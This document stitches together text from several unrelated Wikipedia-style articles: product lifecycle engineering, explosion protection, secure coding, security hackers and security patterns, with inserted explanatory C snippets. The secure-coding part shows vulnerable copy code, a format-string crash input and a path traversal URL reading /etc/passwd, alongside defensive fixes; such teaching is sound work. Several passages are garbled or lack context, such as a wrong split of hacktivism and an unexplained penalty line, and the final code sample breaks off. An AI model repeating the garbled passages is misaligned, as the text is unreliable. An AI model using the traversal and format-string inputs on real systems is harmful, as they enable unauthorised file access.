In some concepts, the investment of resources into research or analysis of options may be included in the conception phase, e.g., bringing the technology to a level of maturity sufficient to move to the next phase. However, life-cycle engineering is iterative. It is always possible that something does not work well enough in some phase, requiring a step back into a prior phase, perhaps all the way back to conception or research. There are many examples to draw from. The new product development process phase collects and evaluates market and technical risks by measuring KPIs and applying scoring models. This step is where the detailed design and development of the product's form starts, progressing to prototype testing, from pilot release to full product launch. It can also involve redesign and ramping to improve existing products, as well as planned obsolescence.[17] CAD is the primary tool used for design and development. This can be simple 2D drawing/drafting or 3D parametric feature-based solid/surface modeling. Such software may include hybrid modeling, reverse engineering, KBE (knowledge-based engineering), NDT (non-destructive testing), and assembly construction. This step covers many engineering disciplines, including mechanical, electrical, electronic, software (embedded), and domain-specific disciplines such as architectural, aerospace, and automotive. Along with the creation of geometry, the components and product assemblies are analyzed. Simulation, validation, and optimization tasks are carried out using CAE (computer-aided engineering) software, either integrated into the CAD package or stand-alone. These are used to perform tasks such as stress analysis, FEA (finite element analysis), kinematics, computational fluid dynamics (CFD), and mechanical event simulation (MES). CAQ (computer-aided quality) is used for tasks such as dimensional tolerance analysis. Another task performed at this stage is the sourcing of bought-out components, possibly with the aid of procurement systems. Once the design of the product's components is complete, the method of manufacturing is defined. This includes CAD tasks such as tool design, including the creation of CNC machining instructions for the product's parts as well as the creation of specific tools to manufacture those parts, using integrated or separate CAM (computer-aided manufacturing) software. This will also involve analysis tools for process simulation of operations such as casting, molding, and die-press forming. Once the manufacturing method has been identified, CPM comes into play. This involves CAPE (computer-aided production engineering) or CAP/CAPP (computer-aided production planning) tools for carrying out factory, plant and facility layout and production simulation, e.g., press-line simulation and industrial ergonomics, as well as tool selection management. After components are manufactured, their geometrical form and size can be checked against the original CAD data with the use of computer-aided inspection equipment and software. Parallel to the engineering tasks, sales product configuration and marketing documentation work take place. This could include transferring engineering data (geometry and part list data) to a web-based sales configurator and other desktop publishing systems. Another phase of the lifecycle involves managing "in-service" information. This can include providing customers and service engineers with the support and information required for repair and maintenance, as well as waste management or recycling.
This can involve the use of tools such as Maintenance, Repair and Overhaul (MRO) management software. Effective service consideration begins during, and even prior to, product design, as an integral part of product lifecycle management. Service Lifecycle Management (SLM) has critical touchpoints at all phases of the product lifecycle that must be considered. Connecting and enriching a common digital thread will provide enhanced visibility across functions, improve data quality, and minimize costly delays and rework. There is an end-of-life to every product. Whether it be the disposal or destruction of material objects or information, this needs to be carefully considered, since it may be legislated and hence not free from ramifications. During the operational phase, a product owner may discover components and consumables which have reached their individual end of life and for which there are Diminishing Manufacturing Sources or Material Shortages (DMSMS), or may find that the existing product can be enhanced for a wider or emerging user market more easily or at less cost than through a full redesign. This modernization approach often extends the product lifecycle and delays end-of-life disposal. None of the above phases should be considered in isolation. In reality, a project does not run sequentially or separated from other product development projects, with information flowing between different people and systems. A major part of PLM is the coordination and management of product definition data. This includes managing engineering changes and the release status of components; configuration of product variations; document management; and planning project resources, as well as timescale and risk assessment. For these tasks, data of a graphical, textual, and meta nature (such as product bills of materials, BOMs) needs to be managed. At the engineering department level, this is the domain of Product Data Management (PDM) software, or at the corporate level Enterprise Data Management (EDM) software; such rigid level distinctions may not be consistently used; however, it is typical to see two or more data management systems within an organization. These systems may also be linked to other corporate systems such as SCM, CRM, and ERP. Associated with these systems are project management systems for project/program planning. This central role is covered by numerous collaborative product development tools that run throughout the whole lifecycle and across organizations. This requires many technology tools in the areas of conferencing, data sharing, and data translation. This specialized field is referred to as product visualization, which includes technologies such as DMU (digital mock-up), immersive virtual digital prototyping (virtual reality), and photo-realistic imaging. The broad array of solutions that make up the tools used within a PLM solution-set (e.g., CAD, CAM, CAx...) were initially used by dedicated practitioners who invested time and effort to gain the required skills. Designers and engineers produced excellent results with CAD systems, manufacturing engineers became highly skilled CAM users, while analysts, administrators, and managers fully mastered their support technologies. However, achieving the full advantages of PLM requires the participation of many people of various skills from throughout an extended enterprise, each requiring the ability to access and operate on the inputs and outputs of other participants.
Despite the increased ease of use of PLM tools, cross-training all personnel on the entire PLM tool-set has not proven to be practical. Now, however, advances are being made to address ease of use for all participants within the PLM arena. One such advance is the availability of "role"-specific user interfaces. Through tailorable user interfaces (UIs), the commands presented to users are appropriate to their function and expertise. A number of such techniques are in use. Concurrent engineering (British English: simultaneous engineering) is a workflow that, instead of working sequentially through stages, carries out a number of tasks in parallel: for example, starting tool design as soon as the detailed design has started, and before the detailed designs of the product are finished; or starting detailed design solid models before the concept design surface models are complete. Although this does not necessarily reduce the amount of manpower required for a project, as more changes are required due to incomplete and changing information, it does drastically reduce lead times and thus time to market.[18] Feature-based CAD systems have allowed simultaneous work on the 3D solid model and the 2D drawing by means of two separate files, with the drawing looking at the data in the model; when the model changes, the drawing will associatively update. Some CAD packages also allow associative copying of geometry between files. This allows, for example, the copying of a part design into the files used by the tooling designer. The manufacturing engineer can then start work on tools before the final design freeze; when a design changes size or shape, the tool geometry will then update. Concurrent engineering also has the added benefit of providing better and more immediate communication between departments, reducing the chance of costly, late design changes. It adopts a problem-prevention method, as compared to the problem-solving and re-designing method of traditional sequential engineering. Bottom–up design (CAD-centric) occurs where the definition of 3D models of a product starts with the construction of individual components. These are then virtually brought together in sub-assemblies of more than one level until the full product is digitally defined. This is sometimes known as the "review structure", which shows what the product will look like. The BOM contains all of the physical (solid) components of a product from a CAD system; it may also (but not always) contain other 'bulk items' required for the final product but which (in spite of having definite physical mass and volume) are not usually associated with CAD geometry, such as paint, glue, oil, adhesive tape, and other materials. Bottom–up design tends to focus on the capabilities of available real-world physical technology, implementing those solutions to which this technology is most suited. When these bottom–up solutions have real-world value, bottom–up design can be much more efficient than top–down design. The risk of bottom–up design is that it very efficiently provides solutions to low-value problems. The focus of bottom–up design is "what can we most efficiently do with this technology?" rather than the focus of top–down, which is "what is the most valuable thing to do?" Top–down design is focused on high-level functional requirements, with relatively less focus on existing implementation technology. A top-level spec is repeatedly decomposed into lower-level structures and specifications until the physical implementation layer is reached.
The risk of top–down design is that it may not take advantage of more efficient applications of current physical technology, due to excessive layers of lower-level abstraction resulting from following an abstraction path that does not efficiently fit the available components, e.g., separately specifying sensing, processing, and wireless communications elements even though a suitable component that combines these may be available. The positive value of top–down design is that it preserves a focus on the optimum solution requirements. A part-centric top–down design may eliminate some of the risks of top–down design. This starts with a layout model, often a simple 2D sketch defining basic sizes and some major defining parameters, which may include some industrial design elements. Geometry from this is associatively copied down to the next level, which represents different subsystems of the product. The geometry in the sub-systems is then used to define more detail in the levels below. Depending on the complexity of the product, a number of levels of this assembly are created until the basic definition of components can be identified, such as position and principal dimensions. This information is then associatively copied to component files. In these files the components are detailed; this is where the classic bottom–up assembly starts. The top–down assembly is sometimes known as a "control structure". If a single file is used to define the layout and parameters for the review structure, it is often known as a skeleton file. Defense engineering traditionally develops the product structure from the top down. The systems engineering process[19] prescribes a functional decomposition of requirements and then the physical allocation of product structure to the functions. This top–down approach would normally have lower levels of the product structure developed from CAD data as a bottom–up structure or design. Both-ends-against-the-middle (BEATM) design is a design process that endeavors to combine the best features of top–down design and bottom–up design into one process. A BEATM design process flow may begin with an emergent technology that suggests solutions which may have value, or it may begin with a top–down view of an important problem that needs a solution. In either case, the key attribute of BEATM design methodology is to immediately focus on both ends of the design process flow: a top–down view of the solution requirements, and a bottom–up view of the available technology which may offer the promise of an efficient solution. The BEATM design process proceeds from both ends in search of an optimum merging somewhere between the top–down requirements and the bottom–up efficient implementation. In this fashion, BEATM has been shown to genuinely offer the best of both methodologies. Indeed, some of the best success stories from either top–down or bottom–up have been successful because of an intuitive, yet unconscious, use of the BEATM methodology[citation needed]. When employed consciously, BEATM offers even more powerful advantages. Front loading takes top–down design to the next stage. The complete control structure and review structure, as well as downstream data such as drawings, tooling development, and CAM models, are constructed before the product has been defined or a project kick-off has been authorized. These assemblies of files constitute a template from which a family of products can be constructed.
When the decision has been made to go ahead with a new product, the parameters of the product are entered into the template model, and all the associated data are updated. Obviously, predefined associative models will not be able to predict all possibilities and will require additional work. The main principle is that a lot of the experimental/investigative work has already been completed. A lot of knowledge is built into these templates to be reused on new products. This does require additional resources "up front" but can drastically reduce the time between project kick-off and launch. Such methods do, however, require organizational changes, as considerable engineering efforts are moved into "offline" development departments. It can be seen as an analogy to creating a concept car to test new technology for future products, but in this case the work is directly used for the next product generation. Individual components cannot be constructed in isolation. CAD and CAID models of components are created within the context of some or all of the other components within the product being developed. This is achieved using assembly modelling techniques. The geometry of other components can be seen and referenced within the CAD tool being used. The other referenced components may or may not have been created using the same CAD tool, with their geometry being translated from other collaborative product development (CPD) formats. Some assembly checking, such as DMU, is also carried out using product visualization software. Product and process lifecycle management (PPLM) is an alternate genre of PLM in which the process by which the product is made is just as important as the product itself. Typical examples are the life sciences and advanced specialty chemicals markets. The process behind the manufacture of a given compound is a key element of the regulatory filing for a new drug application. As such, PPLM seeks to manage information around the development of the process in a similar fashion to how baseline PLM manages information around the development of the product. One variant of PPLM implementation is Process Development Execution Systems (PDES). They typically implement the whole development cycle of high-tech manufacturing technology developments, from initial conception, through development, and into manufacture. PDES integrate people with different backgrounds from potentially different legal entities, as well as data, information and knowledge, and business processes. After the Great Recession, PLM investments from 2010 onwards showed a higher growth rate than most general IT spending.[20] Total spending on PLM software and services was estimated in 2020 to be $26 billion a year, with an estimated compound annual growth rate of 7.2% from 2021 to 2028.[21] This was expected to be driven by demand for software solutions for management functions such as change, cost, compliance, data, and governance management.[21] According to Malakooti (2013),[22] there are five long-term objectives that should be considered in production systems: cost, productivity, quality, flexibility, and sustainability. The relation between these five objectives can be presented as a pyramid with its tip associated with the lowest cost, highest productivity, highest quality, most flexibility, and greatest sustainability. The points inside the pyramid are associated with different combinations of the five criteria. The tip of the pyramid represents an ideal (but likely highly infeasible) system, whereas the base of the pyramid represents the worst system possible.
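As a minimal sketch of the kind of product-structure data (a BOM, as discussed above) that PDM/PLM systems manage, the following C program models a product as a tree of parts and prints it with quantities. The part names and the flat in-memory representation are purely illustrative; real systems store such structures in a database with revisions, release status, and effectivity.

```c
#include <stdio.h>

#define MAX_CHILDREN 8

/* A minimal in-memory bill-of-materials node: each part may have child
 * components, mirroring the multi-level assembly structure described
 * above. All part names are invented for illustration. */
struct bom_node {
    const char *part;
    int quantity;
    int n_children;
    const struct bom_node *children[MAX_CHILDREN];
};

/* Recursively print the product structure with indentation. */
static void print_bom(const struct bom_node *n, int depth) {
    printf("%*s%s x%d\n", depth * 2, "", n->part, n->quantity);
    for (int i = 0; i < n->n_children; i++)
        print_bom(n->children[i], depth + 1);
}

int main(void) {
    struct bom_node bolt  = { "bolt M6",       4, 0, {0} };
    struct bom_node plate = { "base plate",    1, 0, {0} };
    struct bom_node base  = { "base assembly", 1, 2, { &plate, &bolt } };
    struct bom_node prod  = { "product",       1, 1, { &base } };
    print_bom(&prod, 0);
    return 0;
}
```

Even this toy tree shows why a central, managed BOM matters: the same structure drives the review structure, change management, and downstream manufacturing data.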
https://en.wikipedia.org/wiki/Product_lifecycle_(engineering)#Phases_of_product_lifecycle_and_corresponding_technologies
Explosion protection is used to protect all sorts of buildings and civil engineering infrastructure against internal and external explosions or deflagrations. It was widely believed[1] until recently that a building subject to an explosive attack had a chance to remain standing only if it possessed some extraordinary resistive capacity. This belief rested on the assumption that the specific impulse, or the time integral of pressure, which is a dominant characteristic of the blast load, is fully beyond control. Avoidance makes it impossible for an explosion or deflagration to occur, for instance: by suppressing the heat and the pressure needed for an explosion using an aluminum mesh structure such as eXess; by consistently displacing the O2 necessary for an explosion or deflagration with a padding gas (e.g., CO2 or N2); by keeping the concentration of flammable content of an atmosphere consistently below or above the explosive limits (a minimal sketch of such a concentration check follows at the end of this passage); or by consistently eliminating ignition sources. Constructional explosion protection aims at pre-defined, limited or zero damage, achieved through applied protective techniques in combination with reinforcement of the equipment or structures that must be expected to become subject to internal explosion pressure and flying debris, or to external violent impact.[2][3] The technology of protection[4] can range in price dramatically; where the type of device is rational to use, the options run typically from the least to the most expensive solution: explosion doors and vents (dependent on quantities and common denominators); inerting; explosion suppression; isolation; or combinations of the same. To focus on the most cost-effective option: doors typically have lower release-pressure capabilities; are not susceptible to fatigue failures or to changing release pressures with changes in temperature, as "rupture membrane" types are; are capable of leak-tight service at service temperatures of up to 2,000 °F; and can be more cost-effective in small quantities. Rupture membrane type vents can provide a leak-tight seal more readily in most cases, have a relatively broad tolerance on their release pressure, and are more readily incorporated into systems with discharge ducts. There are several fundamental considerations in the review of a system handling potentially explosive dusts, gases or a mixture of the two. Depending upon the design basis being used, often National Fire Protection Association Guideline 68, the definition of these may vary somewhat. To give the reader an appreciation of the issues rather than a design primer, the discussion here is limited to the major considerations only. The database GESTIS-DUST-EX comprises important combustion and explosion characteristics of more than 7,000 dust samples from nearly all sectors of industry. It serves as a basis for the safe handling of combustible dusts and for the planning of preventive and protective measures against dust explosions in dust-generating and processing plants. The GESTIS-DUST-EX database is produced and maintained by the Institute for Occupational Safety and Health of the German Social Accident Insurance. It was elaborated in co-operation with other institutions and companies. The database is available free of charge for occupational safety and health purposes.[5]
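As a minimal sketch of the explosive-limit rule described above, the following C snippet classifies a measured fuel concentration against a lower and upper explosive limit. The limit values used are the commonly cited figures for methane in air (roughly 5 to 15 percent by volume) and serve purely as an illustration, not as design data.

```c
#include <stdio.h>
#include <stdbool.h>

/* An atmosphere is ignitable only while the fuel concentration lies
 * between the lower and upper explosive limits (LEL and UEL). */
static bool within_explosive_range(double vol_percent,
                                   double lel, double uel) {
    return vol_percent >= lel && vol_percent <= uel;
}

int main(void) {
    const double LEL_METHANE = 5.0;   /* vol %, commonly cited value */
    const double UEL_METHANE = 15.0;  /* vol %, commonly cited value */
    const double samples[] = { 2.0, 9.5, 20.0 };

    for (int i = 0; i < 3; i++)
        printf("%5.1f vol %% -> %s\n", samples[i],
               within_explosive_range(samples[i], LEL_METHANE, UEL_METHANE)
                   ? "within explosive range" : "outside explosive range");
    return 0;
}
```

Keeping the concentration consistently below the LEL, or in closed systems above the UEL by padding with an inert gas, is precisely the avoidance strategy described above.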
https://en.wikipedia.org/wiki/Explosion_protection
Secure coding is the practice of developing computer software in a way that guards against the accidental introduction of security vulnerabilities. Defects, bugs and logic flaws are consistently the primary cause of commonly exploited software vulnerabilities.[1] Through the analysis of thousands of reported vulnerabilities, security professionals have discovered that most vulnerabilities stem from a relatively small number of common software programming errors. By identifying the insecure coding practices that lead to these errors and educating developers on secure alternatives, organizations can take proactive steps to help significantly reduce or eliminate vulnerabilities in software before deployment.[2] Some scholars have suggested that in order to effectively confront threats related to cybersecurity, proper security should be coded, or "baked in", to the systems. With security designed into the software, this ensures that there will be protection against insider attacks and reduces the threat to application security.[3] Buffer overflows, a common software security vulnerability, happen when a process tries to store data beyond a fixed-length buffer. For example, if there are 8 slots to store items in, there will be a problem if there is an attempt to store 9 items. In computer memory the overflowed data may overwrite data in the next location, which can result in a security vulnerability (stack smashing) or program termination (segmentation fault).[1] A classic example is a C program that copies user input into a fixed-size buffer with strcpy (minimal sketches of this and the following patterns appear at the end of this passage). If the user input is larger than the destination buffer, a buffer overflow will occur. To fix such an unsafe program, strncpy can be used to prevent a possible buffer overflow. Another secure alternative is to dynamically allocate memory on the heap using malloc: the program then copies the contents of src into dst while also checking the return value of malloc to ensure that enough memory was able to be allocated for the destination buffer. A format string attack occurs when a malicious user supplies specific inputs that will eventually be entered as an argument to a function that performs formatting, such as printf(). The attack involves the adversary reading from or writing to the stack. The C printf function writes output to stdout. If the parameter of the printf function is not properly formatted, several security bugs can be introduced. In a program that passes user input directly as the format string, a malicious argument could be "%s%s%s%s%s%s%s", which can crash the program through improper memory reads. Integer overflow occurs when an arithmetic operation results in an integer too large to be represented within the available space. A program which does not properly check for integer overflow introduces potential software bugs and exploits. Consider a function which attempts to confirm that the sum of x and y is less than or equal to a defined value MAX by computing the sum directly: the problem with such code is that it does not check for integer overflow on the addition operation. If the sum of x and y is greater than the maximum possible value of an unsigned int, the addition operation will overflow and perhaps result in a value less than or equal to MAX, even though the true sum of x and y is greater than MAX. A corrected function checks for overflow by confirming that the sum is greater than or equal to both x and y; if the sum did overflow, the sum would be less than x or less than y.
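The patterns just described can be sketched as follows. Buffer sizes, function names, and the MAX constant are illustrative assumptions rather than text from the original; the sketches are written in C throughout (the integer-overflow example is often shown in C++, but the pattern is identical). First, the overflow-prone copy together with its two safer alternatives:

```c
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 8                 /* illustrative fixed buffer size */

/* Unsafe: strcpy copies until the NUL terminator with no bounds check,
 * so input longer than BUF_SIZE - 1 characters overflows dst. */
void vulnerable_copy(const char *user_input) {
    char dst[BUF_SIZE];
    strcpy(dst, user_input);
}

/* Safer: strncpy bounds the copy; dst is terminated manually because
 * strncpy does not NUL-terminate a truncated string. */
void safer_copy(const char *user_input) {
    char dst[BUF_SIZE];
    strncpy(dst, user_input, BUF_SIZE - 1);
    dst[BUF_SIZE - 1] = '\0';
}

/* Heap alternative: allocate exactly what is needed and check that the
 * allocation succeeded; the caller must free() the result. */
char *heap_copy(const char *src) {
    size_t len = strlen(src) + 1;
    char *dst = malloc(len);
    if (dst == NULL)
        return NULL;
    memcpy(dst, src, len);
    return dst;
}
```

Next, the format string problem: the vulnerable call hands user input to printf as the format string, while the safe call treats it purely as data.

```c
#include <stdio.h>

int main(int argc, char *argv[]) {
    if (argc > 1) {
        printf(argv[1]);        /* vulnerable: "%s%s%s%s%s%s%s" as input
                                   triggers improper memory reads */
        printf("%s", argv[1]);  /* safe: the input is only data */
    }
    return 0;
}
```

Finally, the integer overflow check:

```c
#include <stdbool.h>

#define MAX 100000u               /* illustrative limit */

/* Flawed: x + y can wrap around, so the test may pass even though the
 * true sum exceeds MAX. */
bool sum_is_valid_flawed(unsigned int x, unsigned int y) {
    unsigned int sum = x + y;
    return sum <= MAX;
}

/* Safer: if the unsigned addition wrapped, the result is smaller than
 * both operands, so requiring sum >= x and sum >= y detects it. */
bool sum_is_valid(unsigned int x, unsigned int y) {
    unsigned int sum = x + y;
    return sum >= x && sum >= y && sum <= MAX;
}
```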
Path traversal is a vulnerability whereby paths provided from an untrusted source are interpreted in such a way that unauthorised file access is possible. For example, consider a script that fetches an article by taking a filename, which is then read by the script and parsed. Such a script might use a hypothetical URL like the first one sketched below to retrieve an article about dog food. If the script has no input checking, instead trusting that the filename is always valid, a malicious user could forge a URL like the second to retrieve configuration files from the web server. Depending on the script, this may expose the /etc/passwd file, which on Unix-like systems contains (among others) user IDs, their login names, home directory paths and shells. (See SQL injection for a similar attack.)
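The example URLs referenced above were lost in extraction; the following hypothetical pair (host and script name invented) illustrates the idea:

```
http://example.com/cgi-bin/article.cgi?name=dogfood.html
http://example.com/cgi-bin/article.cgi?name=../../../../etc/passwd
```

A minimal C sketch of the kind of input check whose absence makes the attack possible; the function name and rules are illustrative, and a real implementation would typically canonicalize the path instead of only scanning it:

```c
#include <stdio.h>
#include <string.h>

/* Reject any requested name containing a path separator or a ".."
   component before using it to open a file. */
int is_safe_name(const char *name) {
    if (strstr(name, "..") != NULL)
        return 0;                               /* parent-directory traversal */
    if (strchr(name, '/') != NULL || strchr(name, '\\') != NULL)
        return 0;                               /* absolute or nested paths */
    return 1;
}

int main(void) {
    printf("%d\n", is_safe_name("dogfood.html"));            /* 1: accepted */
    printf("%d\n", is_safe_name("../../../../etc/passwd"));  /* 0: rejected */
    return 0;
}
```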
https://en.wikipedia.org/wiki/Secure_coding
A security hacker or security researcher is someone who explores methods for breaching defenses and exploiting weaknesses in a computer system or network.[1] Hackers may be motivated by a multitude of reasons, such as profit, protest, information gathering,[2] challenge, recreation,[3] or evaluation of a system's weaknesses to assist in formulating defenses against potential hackers. Longstanding controversy surrounds the meaning of the term "hacker". In this controversy, computer programmers reclaim the term hacker, arguing that it refers simply to someone with an advanced understanding of computers and computer networks,[4] and that cracker is the more appropriate term for those who break into computers, whether computer criminals (black hats) or computer security experts (white hats).[5][6] A 2014 article noted that "the black-hat meaning still prevails among the general public".[7] The subculture that has evolved around hackers is often referred to as the "computer underground". The subculture around such hackers is termed the network hacker subculture, hacker scene, or computer underground. It initially developed in the context of phreaking during the 1960s and the microcomputer BBS scene of the 1980s. It is associated with 2600: The Hacker Quarterly and the alt.2600 newsgroup. In 1980, an article in the August issue of Psychology Today (with commentary by Philip Zimbardo) used the term "hacker" in its title: "The Hacker Papers". It was an excerpt from a Stanford Bulletin Board discussion on the addictive nature of computer use. In the 1982 film Tron, Kevin Flynn (Jeff Bridges) describes his intentions to break into ENCOM's computer system, saying "I've been doing a little hacking here". CLU is the software he uses for this. By 1983, hacking in the sense of breaking computer security had already been in use as computer jargon,[8] but there was no public awareness about such activities.[9] However, the release of the film WarGames that year, featuring a computer intrusion into NORAD, raised the public belief that computer security hackers (especially teenagers) could be a threat to national security. This concern became real when, in the same year, a gang of teenage hackers in Milwaukee, Wisconsin, known as The 414s, broke into computer systems throughout the United States and Canada, including those of Los Alamos National Laboratory, Sloan-Kettering Cancer Center and Security Pacific Bank.[10] The case quickly drew media attention,[10] and 17-year-old Neal Patrick emerged as the spokesman for the gang, including a cover story in Newsweek entitled "Beware: Hackers at play", with Patrick's photograph on the cover.[11] The Newsweek article appears to be the first use of the word hacker by the mainstream media in the pejorative sense. Pressured by media coverage, congressman Dan Glickman called for an investigation and began work on new laws against computer hacking.[12][13] Neal Patrick testified before the U.S. House of Representatives on September 26, 1983, about the dangers of computer hacking, and six bills concerning computer crime were introduced in the House that year.[13] As a result of these laws against computer criminality, white hat, grey hat and black hat hackers try to distinguish themselves from each other, depending on the legality of their activities. These moral conflicts are expressed in The Mentor's "The Hacker Manifesto", published in 1986 in Phrack. Use of the term hacker meaning computer criminal was also advanced by the title "Stalking the Wily Hacker", an article by Clifford Stoll in the May 1988 issue of the Communications of the ACM.
Later that year, the release by Robert Tappan Morris, Jr. of the so-called Morris worm provoked the popular media to spread this usage. The popularity of Stoll's book The Cuckoo's Egg, published one year later, further entrenched the term in the public's consciousness. In computer security, a hacker is someone who focuses on the security mechanisms of computer and network systems. Hackers can include someone who endeavors to strengthen security mechanisms by exploring their weaknesses and also those who seek to access secure, unauthorized information despite security measures. Nevertheless, parts of the subculture see their aim in correcting security problems and use the word in a positive sense. White hat is the name given to ethical computer hackers, who utilize hacking in a helpful way. White hats are becoming a necessary part of the information security field.[14] They operate under a code, which acknowledges that breaking into other people's computers is bad, but that discovering and exploiting security mechanisms and breaking into computers is still an interesting activity that can be done ethically and legally. Accordingly, the term bears strong connotations that are favorable or pejorative, depending on the context. Subgroups of the computer underground with different attitudes and motives use different terms to demarcate themselves from each other. These classifications are also used to exclude specific groups with whom they do not agree. Eric S. Raymond, author of The New Hacker's Dictionary, advocates that members of the computer underground should be called crackers. Yet, those people see themselves as hackers and even try to include the views of Raymond in what they see as a wider hacker culture, a view that Raymond has harshly rejected. Instead of a hacker/cracker dichotomy, they emphasize a spectrum of different categories, such as white hat, grey hat, black hat and script kiddie. In contrast to Raymond, they usually reserve the term cracker for more malicious activity. According to Ralph D. Clifford, a cracker or cracking is to "gain unauthorized access to a computer in order to commit another crime such as destroying information contained in that system".[15] These subgroups may also be defined by the legal status of their activities.[16] A white hat hacker breaks security for non-malicious reasons, either to test their own security system, perform penetration tests or vulnerability assessments for a client, or while working for a security company that makes security software.
The term is generally synonymous with ethical hacker, and certifications, courseware, classes, and online training covering the diverse arena of ethical hacking have been developed.[16] A black hat hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain" (Moore, 2005).[17] The term was coined by Richard Stallman to contrast the maliciousness of a criminal hacker with the spirit of playfulness and exploration in hacker culture, or the ethos of the white hat hacker who performs hacking duties to identify places to repair or as a means of legitimate employment.[18] Black hat hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal".[19] A grey hat hacker lies between a black hat and a white hat hacker, hacking for ideological reasons.[20] A grey hat hacker may surf the Internet and hack into a computer system for the sole purpose of notifying the administrator that their system has a security defect, for example. They may then offer to correct the defect for a fee.[19] Grey hat hackers sometimes find the defect in a system and publish the facts to the world instead of to a group of people. Even though grey hat hackers may not necessarily perform hacking for their personal gain, unauthorized access to a system can be considered illegal and unethical. A social status among hackers, elite is used to describe the most skilled. Newly discovered exploits circulate among these hackers. Elite groups such as Masters of Deception conferred a kind of credibility on their members.[21] A script kiddie (also known as a skid or skiddie) is an unskilled hacker who breaks into computer systems by using automated tools written by others (usually by other black hat hackers), hence the term script (i.e. a computer script that automates the hacking) kiddie (i.e. kid, child, an individual lacking knowledge and experience, immature),[22] usually with little understanding of the underlying concept. A neophyte ("newbie", or "noob") is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology and hacking.[19] A blue hat hacker is someone outside computer security consulting firms who is used to bug-test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.[23][24][25] A hacktivist is a hacker who utilizes technology to publicize a social, ideological, religious or political message.
Hacktivism can be divided into two main groups: intelligence agencies and cyberwarfare operatives of nation states,[26] and groups of hackers that carry out organized criminal activities for profit.[26] Modern-day computer hackers have been compared to the privateers of by-gone days.[27] These criminals hold computer systems hostage, demanding large payments from victims to restore access to their own computer systems and data.[28] Furthermore, recent ransomware attacks on industries, including energy, food, and transportation, have been blamed on criminal organizations based in or near a state actor, possibly with the country's knowledge and approval.[29] Cyber theft and ransomware attacks are now the fastest-growing crimes in the United States.[30] Bitcoin and other cryptocurrencies facilitate the extortion of huge ransoms from large companies, hospitals and city governments with little or no chance of being caught.[31] Hackers can usually be sorted into two types of attacks: mass attacks and targeted attacks.[32] They are sorted into the groups in terms of how they choose their victims and how they act on the attacks.[32] In a typical approach to attacking an Internet-connected system, there are several recurring tools of the trade and techniques used by computer criminals and security experts. A security exploit is a prepared application that takes advantage of a known weakness.[34] Common examples of security exploits are SQL injection, cross-site scripting and cross-site request forgery, which abuse security holes that may result from substandard programming practice. Other exploits can be used through File Transfer Protocol (FTP), Hypertext Transfer Protocol (HTTP), PHP, SSH, Telnet and some Web pages. These are very common in Web site and Web domain hacking. The computer underground[3] has produced its own specialized slang, such as 1337speak. Writing software and performing other activities to support these views is referred to as hacktivism. Some consider illegal cracking ethically justified for these goals; a common form is website defacement. The computer underground is frequently compared to the Wild West.[48] It is common for hackers to use aliases to conceal their identities. The computer underground is supported by regular real-world gatherings called hacker conventions or "hacker cons". These events include SummerCon (Summer), DEF CON, HoHoCon (Christmas), ShmooCon (February), Black Hat Conference, Chaos Communication Congress, AthCon, Hacker Halted, and H.O.P.E.[citation needed] Local Hackfest groups organize and compete to develop their skills and to send a team to a prominent convention to compete in group pentesting, exploit and forensics on a larger scale. Hacker groups became popular in the early 1980s, providing access to hacking information and resources and a place to learn from other members. Computer bulletin board systems (BBSs), such as the Utopias, provided platforms for information-sharing via dial-up modem. Hackers could also gain credibility by being affiliated with elite groups.[49] Maximum imprisonment is one year or a fine of the fourth category.[50] 18 U.S.C. § 1030, more commonly known as the Computer Fraud and Abuse Act, prohibits unauthorized access to or damage of "protected computers", a term defined in 18 U.S.C. § 1030(e)(2). The maximum imprisonment or fine for violations of the Computer Fraud and Abuse Act depends on the severity of the violation and the offender's history of violations under the Act.
The FBI has demonstrated its ability to recover ransoms paid in cryptocurrency by victims of cybertheft.[51] The most notable hacker-oriented print publications are Phrack, Hakin9 and 2600: The Hacker Quarterly. While the information contained in hacker magazines and ezines was often outdated by the time they were published, they enhanced their contributors' reputations by documenting their successes.[49] Hackers often show an interest in fictional cyberpunk and cyberculture literature and movies. The adoption of fictional pseudonyms,[52] symbols, values and metaphors from these works is very common.[53]
https://en.wikipedia.org/wiki/Security_hacker
Security patterns can be applied to achieve goals in the area of security. All of the classical design patterns have different instantiations to fulfill some information security goal, such as confidentiality, integrity, or availability. Additionally, one can create a new design pattern to specifically achieve some security goal. The pattern community has provided a collection of security patterns, which were discussed in workshops at Pattern Languages of Programs (PLoP) conferences. They have been unified and published in a joint project.[1] The Open Group provides a set of documented security patterns. One group of these patterns is concerned with the availability of assets, where the assets are either services or resources offered to users. Another group is concerned with the confidentiality and integrity of information, providing means to manage access and usage of sensitive data. The protected system pattern provides a reference monitor or enclave that owns the resources and therefore must be bypassed to get access. The monitor enforces a policy as the single point of access. Design Patterns refers to it as a "Protection Proxy". The policy pattern is an architecture that decouples the policy from the normal resource code. An authenticated user owns a security context (e.g., a role) that is passed to the guard of a resource. The guard checks within the policy whether the context of this user and the rules match, and either provides or denies access to the resource, as in the sketch below. The authenticator pattern is also known as the Pluggable Authentication Modules or the Java Authentication and Authorization Service (JAAS). A further set of security patterns was evolved by Sun Java Center (Sun Microsystems) engineers Ramesh Nagappan and Christopher Steel, which helps in building end-to-end security into multi-tier Java EE enterprise applications and XML-based Web services, enabling identity management in Web applications including single sign-on authentication and multi-factor authentication, and enabling identity provisioning in Web-based applications.
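A minimal C sketch of the protected system/policy idea described above, assuming a hypothetical role-based policy and resource. The structure (a security context, a policy check kept separate from resource code, and a guard as the single access point) follows the description, not any particular library:

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical security context carried by an authenticated user. */
struct context { const char *role; };

/* The policy lives apart from the resource code: here, a table of
   roles permitted to reach the resource. */
static const char *allowed_roles[] = { "admin", "auditor" };

static int policy_permits(const struct context *ctx) {
    for (size_t i = 0; i < sizeof(allowed_roles) / sizeof(*allowed_roles); i++)
        if (strcmp(ctx->role, allowed_roles[i]) == 0)
            return 1;
    return 0;
}

/* The guard is the single point through which the resource is
   reached; it checks the caller's context against the policy. */
void read_resource(const struct context *ctx) {
    if (!policy_permits(ctx)) {
        puts("access denied");
        return;
    }
    puts("sensitive resource contents");
}

int main(void) {
    struct context alice = { "admin" };
    struct context bob   = { "guest" };
    read_resource(&alice);   /* permitted by policy */
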